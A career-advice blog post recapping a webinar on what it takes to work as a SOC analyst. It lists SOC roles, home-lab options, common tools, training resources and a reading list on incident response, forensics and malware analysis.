What is required to Work in SOC Analysis Jobs? 

CyberTalents has launched a series of webinars about cyber security jobs named “What is required to work in cyber security jobs?”. Throughout our webinars series, we will be talking about different cyber security jobs, what is required to work in these jobs? Spotting each job, explaining it in detail, describing its daily operations, resources and training needed and much more. There are around 15 to 20 jobs in the cybersecurity field. However, before starting your career, you need to identify which one of these jobs you would like to master. Accordingly, draw your career path, build your plan, and reach your ultimate goals.


Starting our series, we were honored to have “Eng. Hassan Mouard” who has been in the cybersecurity field for over 20 years. He brings diverse insights into the cybersecurity challenges in several industries including banking, telco, ISP, and consulting. He is currently leading the security services unit of a Fortune 500 company in Egypt, with a high focus on security intelligence and operation consulting. He helps clients worldwide design, build and evolve their cybersecurity programs and capabilities. In addition, he is also an active member in the region's cybersecurity community, a board member in OWASP Cairo chapter, and a regular speaker at local and regional events. Hassan holds a master’s degree in information security engineering from SANS Technology Institute. He is also among the very few holders of GIAC's GSE Certification.


In this webinar, he covered a full understanding of the SOC job market and how to start your career in this field.


What is the need for SOC?

In the last few years, the trend has been moved to prevention in addition to the detection to discover the hackers in the network and prevent the next attacks or any breach of the corporate data.


According to SANS SOC Survey, there is a lack of resources and staff in the cybersecurity field which reflect the need for SOC.



The Job

There are many jobs and roles inside the SOC as below:

Cybersecurity Monitoring “Tier-1”- they are focusing in initial triage.

Cybersecurity Analysis “Tier-2” - understanding the incident and the root cause of the attack.

Incident Response “Tier-3” handle the analysis of more sophisticated attacks.

Intelligence Analysis

Content Engineers

Platform Engineers


   - Malware Analyst

   - Forensics Analyst

   - Threat Hunting


Building Your Own Lab

As Eng. Hassan mentioned, you may need to build your own lab to experiment with different scenarios to get more practical knowledge and here are below different types setup based on your budget and lab size:


Your Own Machine

- Observe Logs for Specific Actions

- Use Adversary Simulation tools

- Good for non malicious techniques Understanding

- Limited understanding of more complex activity (e.g. Lateral Movement)


Virtual Machines

- Use Adversary Simulation Tools + Real-World Attack tools

- Good for both malicious and non malicious techniques understanding

- Make sure you create your snapshots

- Can support more complex scenarios with multiple virtual machines

- Limitation of computer resources



- Flexible, Dynamic, & Unlimited Resources

- But, Beware of the Cost

- Free Tiers might not always be good

- Consider Automation of Provisioning & Configuration (Infrastructure as Code)

         Vagrant/Terraform + Ansible


Tools of SOC

  • Security Analytics

    - SIEM

    - Data Analytics

    - Elastic Stack (ELK)

    - SIEM Community versions (QRadar, Splunk)


    Security Orchestration, Automation, and Response

    - The Hive

    - SOAR Community versions (Phantom)



    - OS Logs

    - Sysmon

    - AuditD


What kind of resources are needed?

MITRE Resources

- Attack.mitre.com

- Shield.mitre.com

- https://mitre-attack.github.io/attack-navigator/enterprise/



- https://cybertalents.com 


- https://cyberdefenders.org




Atomic Red Team

- https://github.com/redcanaryco/atomic-red-team


Red Team Automation

- https://github.com/endgameinc/RTA 


 Reading List

Incident Response

- NIST SP 800-61 Rev. 2 Computer Incident Handling Guide

    ○ https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final

- Blue Team Handbook: Incident Response Edition

- Intelligence-Driven Incident Response: Outwitting the Adversary


Security Operations Center

- Security Operations Center: Building, Operating, and Maintaining your SOC (Cisco Press)

- Blue Team Handbook: SOC, SIEM & Threat Hunting Use Cases


Network Security Monitoring & Analysis

- The Practice of Networ Security Monitoring: Understanding Incident Detection and Response (Richard Bejtlich)

- The TAO of Network Security Monitoring: Beyond Intrusion Detection (Richard Bejtlich)

- Practical Packet Analysis: Using Wireshark to Solve Real World Problems


Computer Forensics

- Incident Response and Computer Forensics, Third Edition

- Art of Memory Forensics

- Digital Forensics with Open Source Tools


Malware Analysis

- Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software

- Malware Analysis Cookbook


Finally, SOC is very important in the cybersecurity industry and the growing number of security issues and attacks increased the demand for SOC Analysts in different areas.